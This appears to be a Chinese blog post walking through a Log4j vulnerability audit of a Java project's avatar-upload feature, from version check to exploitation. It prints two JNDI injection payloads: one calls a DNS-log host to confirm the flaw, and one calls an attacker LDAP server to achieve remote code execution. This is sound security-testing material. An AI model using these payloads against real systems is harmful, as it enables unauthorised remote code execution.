Log4j审计

Log4j审计

1、在项目中搜索log4j,观察是否使用log4j,有的话查看版本信息,历史漏洞等

image-20241127172555194

可以看到有使用log4j的包,去pom.xml寻找版本信息:

image-20241127172604828

查询可以知道该版本存在历史漏洞

2、全局搜索功能实现函数

logger.info 或 logger.error

image-20241127172702956

可以看到绝大多数的函数都是写死的,没有传入变量,这里找到一个获取图片原始文件名的函数

3、审计代码

image-20241127172745127

可以看到这里是用户更换头像的地方,获取上传图像的文件名

4、找到对应路径,抓包

image-20241127172755410

5、带外测试,使用Yakit或dnslog接收访问信息

payload:${jndi:ldap://rdnlnirbvy.zaza.eu.org}

image-20241127172814073

可以看到存在漏洞可以被利用

6、由于使用的jdk版本为jdk8u181,可以利用JNDI测试该漏洞是否存在rce,使用 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 工具

image-20241127172830314

payload:${jndi:ldap://192.168.120.1:1389/uqf4a4}
image-20241127172842729

成功弹出计算器

posted @ 2025-12-02 09:23  shinianyunyan  阅读(10)  评论(0)    收藏  举报